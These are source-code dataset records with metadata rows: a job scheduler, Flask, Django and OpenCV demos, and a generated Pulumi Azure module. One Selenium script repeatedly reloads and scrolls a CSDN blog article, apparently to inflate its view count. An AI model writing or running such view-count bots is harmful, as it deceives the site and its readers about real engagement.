for filename in os.listdir('periodical_jobs'):
if filename.endswith(random_string + '.py'):
filename_ = filename.replace(random_string + '.py', '.py')
os.rename('periodical_jobs/' + filename, 'periodical_jobs/' + filename_)
for periodical_job_list_ in periodical_jobs_list_:
if filename[:-3] in periodical_job_list_:
break
else:
periodical_jobs_list_.append([filename[:-3], eval('periodical_jobs.' + filename[:-3] + '.refreshtime')])
print('Found periodical job ' + filename[:-13] + '.')
os.remove('periodical_jobs/' + filename + 'c')
periodical_jobs_list = list(periodical_jobs_list_)
time.sleep(300)
def refresh_periodical_jobs_start():
global periodical_jobs_list
global periodical_jobs_start
while True:
for periodical_job_list in periodical_jobs_list:
if periodical_job_list[0] != 'perjob_name':
periodical_job_name = periodical_job_list[0][:-10]
if periodical_job_name in periodical_jobs_start:
last_start = periodical_jobs_start[periodical_job_name]
else:
last_start = 0
current_time = int(time.time())
if last_start + periodical_job_list[1] <= current_time:
periodical_jobs_start[periodical_job_name] = current_time
threading.Thread(target = periodical_job_start, args = (periodical_job_list[0], eval('periodical_jobs.' + periodical_job_list[0] + '.type'), eval('periodical_jobs.' + periodical_job_list[0] + '.user'),)).start()
time.sleep(1)
def periodical_job_args(filename, args):
args_ = []
for arg in args:
try:
variable_content = eval('periodical_jobs.' + filename + '.' + arg)
except AttributeError:
variable_content = ''
args_.append(variable_content)
return args_
| UTF-8 | Python | false | false | 4,774 | py | 26 | refresh.py | 25 | 0.586301 | 0.579388 | 0 | 107 | 43.616822 | 231 |
mathieubonnet/capsul | 4,664,334,519,323 | 63402d3ae9a71b5beb01a42b608c5cbb1261a212 | f6a24e51b6012b582d76db0b2e1e27950729b7bb | /capsul/wip/apps_qt/capsulview | b406ea1829809f04ddd26e49b97cb800de7dc52f | [
"LicenseRef-scancode-cecill-b-en"
]
| permissive | https://github.com/mathieubonnet/capsul | 391733a2391c1191b643e6847b5f757cf77c1255 | c9745e339c24fc6a27d0adcc1e0c91b355588cac | refs/heads/master | 2020-04-09T02:54:29.257904 | 2015-03-04T14:36:08 | 2015-03-04T14:36:08 | 31,950,724 | 0 | 0 | null | true | 2015-03-10T10:11:37 | 2015-03-10T10:11:37 | 2015-03-10T10:11:33 | 2015-03-04T14:36:08 | 4,779 | 0 | 0 | 0 | null | null | null | #! /usr/bin/env python
##########################################################################
# CAPSUL - Copyright (C) CEA, 2013
# Distributed under the terms of the CeCILL-B license, as published by
# the CEA-CNRS-INRIA. Refer to the LICENSE file or to
# http://www.cecill.info/licences/Licence_CeCILL-B_V1-en.html
# for details.
##########################################################################
# System import
import logging
import sys
# Capsul import
from soma.qt_gui import qt_backend
# TODO: add option to set backend befor importing QtCore
#qt_backend.set_qt_backend("PyQt4")
#qt_backend.init_matplotlib_backend()
from soma.qt_gui.qt_backend import QtCore
try :
from capsul.apps_qt.pipeline_viewer_app import PipelineViewerApp
app = PipelineViewerApp()
except :
import sys
import traceback
exc_info = sys.exc_info()
trace = "".join(traceback.format_exception(*exc_info))
logging.error(trace)
else :
QtCore.QObject.connect(app, QtCore.SIGNAL('lastWindowClosed()'),
app, QtCore.SLOT('quit()'))
sys.exit(app.exec_())
| UTF-8 | Python | false | false | 1,106 | 41 | capsulview | 37 | 0.604882 | 0.599458 | 0 | 37 | 28.864865 | 74 |
|
linrong/flask-practice | 7,679,401,535,989 | 5f582adb76386012ae98a8c0a2f0f4dc2f739104 | 3f1918a279e807505c6fa13a597eb0d121a095f6 | /flask_demo/3/view_demo4/method_view.py | 03286b26585d9b0a44d27f66a8fe1d530af3bf75 | [
"MIT"
]
| permissive | https://github.com/linrong/flask-practice | b177d5f52c4b55e78bbd5bf14c47decd74c87a28 | 91ec9d8219482562cb95a1df9ff846f9ca7ea9f1 | refs/heads/master | 2020-09-22T18:13:19.673917 | 2019-04-16T08:23:18 | 2019-04-16T08:23:18 | 225,296,899 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from flask import Flask,jsonify
from flask.views import MethodView
app=Flask(__name__)
# 基于调度方法的视图,对于每个HTTP方法执行不同的函数,类似RESTful API
class UserAPI(MethodView):
def get(self):
return jsonify({
'username':'fake',
'avtar':'http://lorempixel.com/100/100/nature'
})
def post(self):
return 'UNSUPPORTED!'
app.add_url_rule('/user',view_func=UserAPI.as_view('userview'))
if __name__=='__main__':
app.run(host='0.0.0.0',port=9001)
| UTF-8 | Python | false | false | 540 | py | 43 | method_view.py | 34 | 0.622951 | 0.594262 | 0 | 19 | 24.684211 | 63 |
socketwiz/pi-wall-project | 5,617,817,239,799 | d8711680538fbb56d72dbd44a92cac172fda7944 | 9763810c6017f5b7ce6d681bc931a24c45786655 | /pi_wall_project/bus/views.py | ce0d4eab2bd07600802f893219345068abc4f2eb | []
| no_license | https://github.com/socketwiz/pi-wall-project | c29628335b4690e09b735a17c121a19bbc869694 | f8d2f459c3a1117fcd0f5f934a308b24446395dd | refs/heads/master | 2021-09-10T22:02:51.796093 | 2021-03-01T13:10:42 | 2021-03-01T13:10:42 | 56,316,370 | 0 | 0 | null | false | 2021-09-10T18:16:54 | 2016-04-15T11:50:29 | 2021-03-01T13:10:48 | 2021-09-10T18:16:53 | 22,846 | 0 | 0 | 39 | JavaScript | false | false | from django.http import JsonResponse
from django.shortcuts import render
from .models import Holiday, Schedule
from .serializers import HolidaySerializer, ScheduleSerializer
from rest_framework import generics
import os, pyaudio, _thread, wave
def play_sound():
alarm = 'school-bell.wav'
chunk = 1024
try:
sound = wave.open('bus/media/%s' % alarm, 'rb')
except FileNotFoundError:
print('%s/bus/media/%s not found' % (os.getcwd(), alarm))
else:
pa = pyaudio.PyAudio()
stream = pa.open(format = pa.get_format_from_width(sound.getsampwidth()),
channels = sound.getnchannels(),
rate = sound.getframerate(),
output = True)
data = sound.readframes(chunk)
while data:
stream.write(data)
data = sound.readframes(chunk)
stream.stop_stream()
stream.close()
pa.terminate()
def index(request):
return render(request, 'bus/index.html')
def alarm(request):
_thread.start_new_thread(play_sound, ())
return JsonResponse({'msg': 'alarm sounding'})
class BusScheduleCreate(generics.ListCreateAPIView):
queryset = Schedule.objects.all()
serializer_class = ScheduleSerializer
class BusHolidayCreate(generics.ListCreateAPIView):
queryset = Holiday.objects.all()
serializer_class = HolidaySerializer
| UTF-8 | Python | false | false | 1,412 | py | 52 | views.py | 40 | 0.644476 | 0.641643 | 0 | 55 | 24.672727 | 81 |
paigekehoe/slacktactoe | 12,627,203,886,802 | 867ebf84dc56050412218d3ddb490356061b00e7 | e1427e6dae356d9af99fd961023581787cdb2b49 | /app.py | 0833c1776ea8f937801db3919015d81ab4493969 | [
"MIT"
]
| permissive | https://github.com/paigekehoe/slacktactoe | 5cf96ec163ffebbe366ec628576feef521298ae6 | 1758e48a2f2b46fdfb6ccdb068c567fbdfb3592a | refs/heads/master | 2021-07-25T09:04:51.067440 | 2017-11-07T18:26:48 | 2017-11-07T18:26:48 | 109,851,064 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import os
import re
from slackclient import SlackClient
from flask import Flask, request, jsonify, abort
import game
import keys
## A simple tic tac toe slack application
## Author: Paige Kehoe
## Date: 11/6/17
SLACK_TOKEN = os.environ['SLACK_TOKEN']
## getting the SLACK_TOKEN from hidden variable :)
active_games = {}
slack_client = SlackClient(SLACK_TOKEN)
#key for board to display for users in help
board_key = "| 1 | 2 | 3 |\n|----+----+----|\n| 4 | 5 | 6 |\n|----+----+----|\n| 7 | 8 | 9 |"
app = Flask(__name__)
def setup():
channels_call = slack_client.api_call("channels.list", exclude_archived=1)
lookup_table = {}
if channels_call.get('ok'):
for channel in channel_call:
lookup_table[channel['id']] = None
return lookup_table
return None
def validate_user():
pass
def new_game(channel_id, player0, player1):
#check if game exists in channel lookup
test_game = active_games.get(channel_id, None)
if test_game != None:
message = {
"response_type":"ephemeral",
"text": "I'm sorry there is already an active game in this channel",
}
#check for playing self or for null opponent
elif (player1 == "") or (player0 == player1):
message = {
"response_type":"ephemeral",
"text": "That is not a valid opponent in this channel",
}
else:
#TO DO validate both users are in channel and not deleted - (player1 not in channel_id.info.members)
new_game = game.Game()
tempStr =player1.split("|")
player1 = tempStr[0][2:]
new_game.set_up(player0, player1)
active_games[channel_id]=new_game
message = {
"response_type":"ephemeral",
"text": "Please input a cell number with the command /ttt move # to make your first move\n" + board_key,
}
return message
def help(channel_id):
help_str = "All possible commands for tic tac toe are below:\n /ttt help: list commands\n/ttt play @username: starts new game\n/ttt move #: adds an X or O to that space on the board\n/ttt quit: quit game\nTo make a move, select from the following space options:\n" + board_key + ""
message = {
"response_type": "ephemeral",
"text": help_str,
}
return message
def end_game(channel_id, user_id):
game_obj = active_games.get(channel_id, None)
#check if no game is in the channel
if game_obj == None:
message = {
"response_type":"ephemeral",
"text": "Sorry there is no active game in this channel at this time."
}
return message
if user_id != game_obj.player_1 or game_obj.player_0:
message = {
"response_type":"ephemeral",
"text": "Don't be silly! You can't quit someone else's game"
}
if game_obj.end_condition == 0:
#Call P0/Os Win Message
message = {
"response_type": "in_channel",
"text": "Hey <@"+ channel_id + "> we have a tic tac toe winner and it's: <@" + game_obj.player_0 + ">\n" + print_board(game_obj.board),
}
elif game_obj.end_condition == 3:
#Call P1/Xs Win Message
message = {
"response_type": "in_channel",
"text": "Hey <@"+ channel_id + "> we have a tic tac toe winner and it's: <@" + game_obj.player_1 + ">\n" + print_board(game_obj.board),
}
elif game_obj.end_condition == 4:
#Call draw game
message = {
"response_type": "in_channel",
"text": "Hey <@"+ channel_id + "> this game is over and it ended in a draw :(\n" + print_board(game_obj.board),
}
elif user_id != None:
message = {
"response_type": "in_channel",
"text":"<@"+ user_id + "> decided to quit the game :(",
}
active_games[channel_id]=None
return message
def print_board(board):
#input parameter: board list from Game class
display_board = ""
counter = 1
for spot in board:
if spot == 0:
#append O to board spot
display_board += " :o: "
elif spot == 1:
#aapend X to board spot
display_board += " :heavy_multiplication_x: "
elif spot == 9:
#append blank to board spot
display_board += " "
if counter in (1, 2, 4, 5, 7, 8):
display_board += "|"
if counter in (3, 6):
display_board += "\n---------------------\n"
counter +=1
return display_board
def move(channel_id, request, player):
game = active_games.get(channel_id, None)
message = {
"response_type": "ephemeral",
"text": "Sorry that was invalid, please select a number from the following configuration",
}
if game == None:
message = {
"response_type": "ephemeral",
"text": "Sorry there is no active game in this channel at this time.",
}
return message
print "statement "+ game.player_1 + " and this is counter: " + str(game.turn_count) + " and this is p0 " + game.player_0 + " and this is player " + player
#statement U7VQCMCKG and this is counter: 0 and this is p0 U7V2GQZ9T and this is player0 U7V2GQZ9T
if (game.turn_count%2 == 1 and player != game.player_1):
message = {
"response_type": "ephemeral",
"text": "Nice try! But it's not your turn",
}
return message
if (game.turn_count%2 == 0 and player != game.player_0):
message = {
"response_type": "ephemeral",
"text": "Nice try! But it's not your turn",
}
return message
try:
number = int(request)
except:
message = {
"response_type": "ephemeral",
"text": "That is not a valid move",
}
return message
if game.is_free(number) == False:
message = {
"response_type": "ephemeral",
"text": "That is not a valid move",
}
return message
#TO DO: verify player is in game and channel
if player == game.player_0 and game.turn_count == 0:
p0 = "<@"+player+">"
#first move scenario
game.turn(number)
message = {
"response_type":"in_channel",
"text": "<@" + game.player_0 + "> has challenged <@" + game.player_1 + "> to a game of tic tac toe!\nCurrent board is\n"+print_board(game.board) + "\n<@" + game.player_1 + "> please make your move",
}
return message
game.turn(number)
if game.check_win() == True:
return end_game(channel_id, player)
else:
message = {
"response_type":"in_channel",
"text": "current board status:\n" + print_board(game.board),
}
return message
##if statement to determine responses to /ttt command
##valid input params: command, @username, space to move
#ttt play @username - set up new game against that opponent
#ttt move # - makes a move by number space
#ttt quit - ends game in channel
#ttt help - displays all command options
@app.route('/', methods=['POST'])
def index():
parameters = ['play','quit','move','help', 'gamestatus']
info = request.form
token = info.get('token', None)
command = info.get('command', None)
text = info.get('text', None)
channel = info.get('channel_id')
response = {
"response_type": "ephemeral",
"text":"I'm not sure what you are trying to say.\nPlease type /ttt help to see a list of valid commands",
}
##if invalid token
# if token != SLACK_TOKEN:
# return "Invalid token for /ttt"
if 'ttt' not in command:
return "invalid request"
if 'play' in text:
p0 = info.get('user_id')
p1 = str(text[5:])
response = new_game(channel, p0, p1)
if 'move' in text:
space = str(text[5:])
response = move(channel, space, info.get('user_id'))
if text == 'quit':
player = info.get('user_id')
response = end_game(channel, player)
if text == 'help':
response = help(channel)
return jsonify(response)
if __name__ == '__main__':
app.debug = False
app.run('0.0.0.0', 5000) | UTF-8 | Python | false | false | 8,342 | py | 3 | app.py | 2 | 0.560657 | 0.550108 | 0 | 243 | 33.333333 | 285 |
gduvalsc/kairos | 13,228,499,304,562 | 6e1e1ea750d97b83179e9cf2470bc7c502e329cb | 035a3eebe2091897b942796781a192f67680b336 | /worker.py | 781c2a70051ece0aee5cff606df3664ea63e51ee | []
| no_license | https://github.com/gduvalsc/kairos | 763eb8fa5daeefc5fd46ea066a47400d5be7b7f5 | 2bf863ba3f73fc16ef75842ad390eb55fb1906f1 | refs/heads/master | 2021-12-23T18:33:34.382989 | 2021-10-19T16:44:00 | 2021-10-19T16:44:00 | 77,072,517 | 4 | 3 | null | null | null | null | null | null | null | null | null | null | null | null | null | import pykairos
application = pykairos.KairosWorker().application | UTF-8 | Python | false | false | 65 | py | 139 | worker.py | 130 | 0.861538 | 0.861538 | 0 | 2 | 32 | 49 |
yumingzhu/pydemo | 1,855,425,909,131 | 8d90ce88557324e926884df167cad56f8c34320a | 7935d5e1b2e97c5b2933df32a2a4086d7de076bc | /demo/selenium/demoCSDN.py | f4b957ef33b7aff6ecebdcb026c087690899dee7 | []
| no_license | https://github.com/yumingzhu/pydemo | 6b1d0f06c65ee836d7e667ee63cd0d35f634b438 | 6b204723a0a7f08a36883c8db35355a6c8e8526b | refs/heads/master | 2022-12-10T07:11:32.723391 | 2020-08-28T09:48:51 | 2020-08-28T09:48:51 | 291,010,541 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import time
from retrying import retry
from selenium import webdriver
@retry(stop_max_attempt_number=3)
def getToCsdn():
time.sleep(30)
options = webdriver.ChromeOptions()
prefs = {
'profile.default_content_setting_values': {
'images': 2
}
}
options.add_experimental_option('excludeSwitches', ['enable-automation'])
options.add_experimental_option('prefs', prefs)
driver = webdriver.Chrome(executable_path="G:/pywork/chromedriver.exe", options=options)
count = 0
while True:
driver.get("https://blog.csdn.net/yumingzhu1/article/details/108254255")
time.sleep(20)
js = 'window.scrollTo(0,500)'
driver.execute_script(js)
time.sleep(10)
time.sleep(30)
count = count + 1
print(count)
driver.back()
if __name__ == '__main__':
getToCsdn()
| UTF-8 | Python | false | false | 876 | py | 37 | demoCSDN.py | 37 | 0.626712 | 0.597032 | 0 | 31 | 27.258065 | 92 |
InCodeLearning/InCodeLearning-Python3 | 1,760,936,596,882 | 452fa494a830a5c7d6d89323be4f80539d62e6c5 | 103bfe29fa92dc02411dad257e4486d5a71075d7 | /built_ins/sequence_list.py | 2d7fc55f4b59c9d9b366f6f064433da195fab793 | []
| no_license | https://github.com/InCodeLearning/InCodeLearning-Python3 | 85eed07242d869ddfef57895c60c7987e5266b83 | 6968983514e696472d13ef62ebae59828a8da44b | refs/heads/master | 2022-12-21T23:39:42.298427 | 2021-02-24T02:45:45 | 2021-02-24T02:45:45 | 63,978,085 | 8 | 3 | null | false | 2016-11-19T03:05:47 | 2016-07-22T19:26:39 | 2016-10-18T17:27:45 | 2016-11-19T03:05:46 | 232 | 8 | 4 | 1 | Python | null | null | # C source https://github.com/python/cpython/blob/master/Include/listobject.h
# dynamic array, not linked list
# Array can only contain same type items,
# mostly numbers as numpy array, to handle large data sets efficiently
# list is mutable
# using list as a queue, not efficient
queue = [0, 1, 2, 3, 4]
queue.append(5)
queue.append(6)
print(queue)
queue.pop(0)
print(queue) # elements 1-6 shifted left by one O(n) time
l = [True, 2, 3.5, 5 - 8j, [9, 7, 5], 'python', ('a', 2)]
print(hex(id(l))) # 0x2564cb0 memory address (32 bit?), machine dependent.
print(len(l)) # 7
# slicing, not including the second slice index
print(l[:5]) # [True, 2, 3.5, 5-8j, [9, 7, 5]],
# list index
print(l[0]) # True
print(l[-7]) # True list[-n] == list[len(list) - n]
# print(l[-8]) Error, index out of range, not intuitive
print(l[4:-1]) # [[9, 7, 5], 'python'], combination of pos & neg index
print(l[4:-6]) # [], if 2nd slice index on the left of 1st one
print("4:-8", l[4:-8]) # not intuitive, no error
print(l[6:3]) # [], same reason as above one
print("======adding items to a list======")
print(l + ['concat', 'at', 'end']) # list concat, create a new list
l.append([1, 2, 3]) # add a sublist
print(l)
# [True, 2, 3.5, (5-8j), [9, 7, 5], 'python', ('a', 2), [1, 2, 3]]
l.extend([4, 5, 'a']) # add three numbers
print(l)
# [True, 2, 3.5, (5-8j), [9, 7, 5], 'python', ('a', 2), [1, 2, 3], 4, 5, 'a']
l.insert(0, 'a') # assign item to specific position
print(l)
print("======searching for values in a list======")
print(l.count('a')) # 2, return # how many items that item shows in the list
print(l.count(2)) # 1, item in the sublist is not counted
print(l.index('a')) # return to the first match item
# -1 is valid index for list, raise exception is better than return -1
try:
print('a is in l', l.index('a'))
print(l.index('not in l'))
except ValueError:
print('"not in l" is not in l')
print("======removing list items======")
l.remove('a') # delete the first match item
print(l)
# [True, 2, 3.5, (5-8j), [9, 7, 5], 'python', ('a', 2), [1, 2, 3], 4, 5, 'a']
del l[1]
l.pop() # remove the last item
print(l)
# [True, 2, 3.5, (5-8j), [9, 7, 5], 'python', ('a', 2), [1, 2, 3], 4, 5]
# print(l.sort()) exception, TypeError: unorderable types: complex() < float()
l.remove(l[3]) # remove assigned index item
print(l) # [True, 2, 3.5, [9, 7, 5], 'python', ('a', 2), [1, 2, 3], 4, 5]
# print(l.sort()) TypeError: unorderable types: list() < float(),
# l.sort() should be used in homogeneous type list
l.pop(3) # remove the assigned index item, l.pop(1) or l.pop([1])
l.pop(-3)
l.pop(-3)
print(l) # [True, 2, 3.5, 'python', 4, 5]
print(hex(id(l))) # 0x2584cb0, same as previous.
ls = [i for i in range(5)]
print(ls) # [0, 1, 2, 3, 4]
print(hex(id(ls))) # 0x764cd8
ls.sort(reverse=True)
print(ls) # [ 4, 3, 2, 1, 0]
l_string = ['a', 'p', 'Python', 'C', 'c#', 'c++']
l_string.sort()
print(l_string) # ['C', 'Python', 'a', 'c#', 'c++', 'p']
l_str = [i.lower() for i in l_string]
print(l_str) # ['c', 'python', 'a', 'c#', 'c++', 'p']
l_str.sort()
print(l_str) # ['a', 'c', 'c#', 'c++', 'p', 'python']
l2 = [4, 3, 2, 1, 0]
print(hex(id(l2))) # 0x554d50
print(ls == l2) # True, the comparison is not address, but content
l.reverse()
print(l) # [5, 4, 'python', 3.5, 2, True]
# Todo compare shallow deepcopy
l_new = l.copy()
l_new2 = l[:]
print(l_new, l_new2)
# [5, 4, 'python', 3.5, 2, True] [5, 4, 'python', 3.5, 2, True]
print(hex(id(l)), hex(id(l_new)), hex(id(l_new2)))
# memory addresses are different.
# A tuple is an immutable list. Once it is created, it can not be changed.
# Except the method, which will change the content of the List,
# such as insert(), extend(), remove()etc, Tuple can use the methods of List.
| UTF-8 | Python | false | false | 3,778 | py | 45 | sequence_list.py | 38 | 0.592642 | 0.540233 | 0 | 114 | 32.140351 | 78 |
sdYoo/ImgRecogSystem | 7,138,235,682,649 | 95d7937d860a04c3d6e55d71bdd9784278bbc907 | cc4878e8ebfa86387e7ae0c13a89815007da3d3a | /ProbabilisticHoughTransform.py | d20dcd603b5d919850f65e1a0d66e3b0107eeb78 | []
| no_license | https://github.com/sdYoo/ImgRecogSystem | fda2b8b3582d0c580591e2ab51a6a0997f1dd5de | c6ef7f82560542f8d7ea4fe37b71ddea2aa31758 | refs/heads/master | 2022-10-28T12:50:41.080308 | 2020-06-10T11:34:13 | 2020-06-10T11:34:13 | 271,174,885 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import cv2
import numpy as np
def show_ProbabilisticHoughTransform():
img = cv2.imread('images/20200610-sudoku-01.jpg')
gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
edges = cv2.Canny(gray,50,150,apertureSize = 3)
minLineLength = 50
maxLineGap = 5
lines = cv2.HoughLinesP(edges,1,np.pi/180,100,minLineLength,maxLineGap)
for line in lines:
x1,y1,x2,y2 = line[0]
cv2.line(img,(x1,y1),(x2,y2),(0,255,0),1)
cv2.imshow('edges', edges)
cv2.imshow('result', img)
cv2.waitKey()
cv2.destroyAllWindows()
show_ProbabilisticHoughTransform() | UTF-8 | Python | false | false | 593 | py | 7 | ProbabilisticHoughTransform.py | 7 | 0.669477 | 0.580101 | 0 | 24 | 23.75 | 75 |
pulumi/pulumi-azure-native | 7,911,329,785,222 | b06d4d3c94ad71181c372f43a68641d996d792d5 | b049a961f100444dde14599bab06a0a4224d869b | /sdk/python/pulumi_azure_native/search/get_service.py | 284fe59973d3757b751b19d4cb1e902508fac874 | [
"BSD-3-Clause",
"Apache-2.0"
]
| permissive | https://github.com/pulumi/pulumi-azure-native | b390c88beef8381f9a71ab2bed5571e0dd848e65 | 4c499abe17ec6696ce28477dde1157372896364e | refs/heads/master | 2023-08-30T08:19:41.564780 | 2023-08-28T19:29:04 | 2023-08-28T19:29:04 | 172,386,632 | 107 | 29 | Apache-2.0 | false | 2023-09-14T13:17:00 | 2019-02-24T20:30:21 | 2023-09-11T17:08:08 | 2023-09-14T13:16:52 | 2,507,628 | 104 | 26 | 377 | Python | false | false | # coding=utf-8
# *** WARNING: this file was generated by pulumi. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import copy
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
__all__ = [
'GetServiceResult',
'AwaitableGetServiceResult',
'get_service',
'get_service_output',
]
@pulumi.output_type
class GetServiceResult:
"""
Describes an Azure Cognitive Search service and its current state.
"""
def __init__(__self__, auth_options=None, disable_local_auth=None, encryption_with_cmk=None, hosting_mode=None, id=None, identity=None, location=None, name=None, network_rule_set=None, partition_count=None, private_endpoint_connections=None, provisioning_state=None, public_network_access=None, replica_count=None, shared_private_link_resources=None, sku=None, status=None, status_details=None, tags=None, type=None):
if auth_options and not isinstance(auth_options, dict):
raise TypeError("Expected argument 'auth_options' to be a dict")
pulumi.set(__self__, "auth_options", auth_options)
if disable_local_auth and not isinstance(disable_local_auth, bool):
raise TypeError("Expected argument 'disable_local_auth' to be a bool")
pulumi.set(__self__, "disable_local_auth", disable_local_auth)
if encryption_with_cmk and not isinstance(encryption_with_cmk, dict):
raise TypeError("Expected argument 'encryption_with_cmk' to be a dict")
pulumi.set(__self__, "encryption_with_cmk", encryption_with_cmk)
if hosting_mode and not isinstance(hosting_mode, str):
raise TypeError("Expected argument 'hosting_mode' to be a str")
pulumi.set(__self__, "hosting_mode", hosting_mode)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if identity and not isinstance(identity, dict):
raise TypeError("Expected argument 'identity' to be a dict")
pulumi.set(__self__, "identity", identity)
if location and not isinstance(location, str):
raise TypeError("Expected argument 'location' to be a str")
pulumi.set(__self__, "location", location)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if network_rule_set and not isinstance(network_rule_set, dict):
raise TypeError("Expected argument 'network_rule_set' to be a dict")
pulumi.set(__self__, "network_rule_set", network_rule_set)
if partition_count and not isinstance(partition_count, int):
raise TypeError("Expected argument 'partition_count' to be a int")
pulumi.set(__self__, "partition_count", partition_count)
if private_endpoint_connections and not isinstance(private_endpoint_connections, list):
raise TypeError("Expected argument 'private_endpoint_connections' to be a list")
pulumi.set(__self__, "private_endpoint_connections", private_endpoint_connections)
if provisioning_state and not isinstance(provisioning_state, str):
raise TypeError("Expected argument 'provisioning_state' to be a str")
pulumi.set(__self__, "provisioning_state", provisioning_state)
if public_network_access and not isinstance(public_network_access, str):
raise TypeError("Expected argument 'public_network_access' to be a str")
pulumi.set(__self__, "public_network_access", public_network_access)
if replica_count and not isinstance(replica_count, int):
raise TypeError("Expected argument 'replica_count' to be a int")
pulumi.set(__self__, "replica_count", replica_count)
if shared_private_link_resources and not isinstance(shared_private_link_resources, list):
raise TypeError("Expected argument 'shared_private_link_resources' to be a list")
pulumi.set(__self__, "shared_private_link_resources", shared_private_link_resources)
if sku and not isinstance(sku, dict):
raise TypeError("Expected argument 'sku' to be a dict")
pulumi.set(__self__, "sku", sku)
if status and not isinstance(status, str):
raise TypeError("Expected argument 'status' to be a str")
pulumi.set(__self__, "status", status)
if status_details and not isinstance(status_details, str):
raise TypeError("Expected argument 'status_details' to be a str")
pulumi.set(__self__, "status_details", status_details)
if tags and not isinstance(tags, dict):
raise TypeError("Expected argument 'tags' to be a dict")
pulumi.set(__self__, "tags", tags)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
@property
@pulumi.getter(name="authOptions")
def auth_options(self) -> Optional['outputs.DataPlaneAuthOptionsResponse']:
"""
Defines the options for how the data plane API of a search service authenticates requests. This cannot be set if 'disableLocalAuth' is set to true.
"""
return pulumi.get(self, "auth_options")
@property
@pulumi.getter(name="disableLocalAuth")
def disable_local_auth(self) -> Optional[bool]:
"""
When set to true, calls to the search service will not be permitted to utilize API keys for authentication. This cannot be set to true if 'dataPlaneAuthOptions' are defined.
"""
return pulumi.get(self, "disable_local_auth")
@property
@pulumi.getter(name="encryptionWithCmk")
def encryption_with_cmk(self) -> Optional['outputs.EncryptionWithCmkResponse']:
"""
Specifies any policy regarding encryption of resources (such as indexes) using customer manager keys within a search service.
"""
return pulumi.get(self, "encryption_with_cmk")
@property
@pulumi.getter(name="hostingMode")
def hosting_mode(self) -> Optional[str]:
"""
Applicable only for the standard3 SKU. You can set this property to enable up to 3 high density partitions that allow up to 1000 indexes, which is much higher than the maximum indexes allowed for any other SKU. For the standard3 SKU, the value is either 'default' or 'highDensity'. For all other SKUs, this value must be 'default'.
"""
return pulumi.get(self, "hosting_mode")
@property
@pulumi.getter
def id(self) -> str:
"""
Fully qualified resource ID for the resource. Ex - /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def identity(self) -> Optional['outputs.IdentityResponse']:
"""
The identity of the resource.
"""
return pulumi.get(self, "identity")
@property
@pulumi.getter
def location(self) -> str:
"""
The geo-location where the resource lives
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> str:
"""
The name of the resource
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="networkRuleSet")
def network_rule_set(self) -> Optional['outputs.NetworkRuleSetResponse']:
"""
Network specific rules that determine how the Azure Cognitive Search service may be reached.
"""
return pulumi.get(self, "network_rule_set")
@property
@pulumi.getter(name="partitionCount")
def partition_count(self) -> Optional[int]:
"""
The number of partitions in the search service; if specified, it can be 1, 2, 3, 4, 6, or 12. Values greater than 1 are only valid for standard SKUs. For 'standard3' services with hostingMode set to 'highDensity', the allowed values are between 1 and 3.
"""
return pulumi.get(self, "partition_count")
@property
@pulumi.getter(name="privateEndpointConnections")
def private_endpoint_connections(self) -> Sequence['outputs.PrivateEndpointConnectionResponse']:
"""
The list of private endpoint connections to the Azure Cognitive Search service.
"""
return pulumi.get(self, "private_endpoint_connections")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> str:
"""
The state of the last provisioning operation performed on the search service. Provisioning is an intermediate state that occurs while service capacity is being established. After capacity is set up, provisioningState changes to either 'succeeded' or 'failed'. Client applications can poll provisioning status (the recommended polling interval is from 30 seconds to one minute) by using the Get Search Service operation to see when an operation is completed. If you are using the free service, this value tends to come back as 'succeeded' directly in the call to Create search service. This is because the free service uses capacity that is already set up.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter(name="publicNetworkAccess")
def public_network_access(self) -> Optional[str]:
"""
This value can be set to 'enabled' to avoid breaking changes on existing customer resources and templates. If set to 'disabled', traffic over public interface is not allowed, and private endpoint connections would be the exclusive access method.
"""
return pulumi.get(self, "public_network_access")
@property
@pulumi.getter(name="replicaCount")
def replica_count(self) -> Optional[int]:
"""
The number of replicas in the search service. If specified, it must be a value between 1 and 12 inclusive for standard SKUs or between 1 and 3 inclusive for basic SKU.
"""
return pulumi.get(self, "replica_count")
@property
@pulumi.getter(name="sharedPrivateLinkResources")
def shared_private_link_resources(self) -> Sequence['outputs.SharedPrivateLinkResourceResponse']:
"""
The list of shared private link resources managed by the Azure Cognitive Search service.
"""
return pulumi.get(self, "shared_private_link_resources")
@property
@pulumi.getter
def sku(self) -> Optional['outputs.SkuResponse']:
"""
The SKU of the Search Service, which determines price tier and capacity limits. This property is required when creating a new Search Service.
"""
return pulumi.get(self, "sku")
@property
@pulumi.getter
def status(self) -> str:
"""
The status of the search service. Possible values include: 'running': The search service is running and no provisioning operations are underway. 'provisioning': The search service is being provisioned or scaled up or down. 'deleting': The search service is being deleted. 'degraded': The search service is degraded. This can occur when the underlying search units are not healthy. The search service is most likely operational, but performance might be slow and some requests might be dropped. 'disabled': The search service is disabled. In this state, the service will reject all API requests. 'error': The search service is in an error state. If your service is in the degraded, disabled, or error states, it means the Azure Cognitive Search team is actively investigating the underlying issue. Dedicated services in these states are still chargeable based on the number of search units provisioned.
"""
return pulumi.get(self, "status")
@property
@pulumi.getter(name="statusDetails")
def status_details(self) -> str:
"""
The details of the search service status.
"""
return pulumi.get(self, "status_details")
@property
@pulumi.getter
def tags(self) -> Optional[Mapping[str, str]]:
"""
Resource tags.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> str:
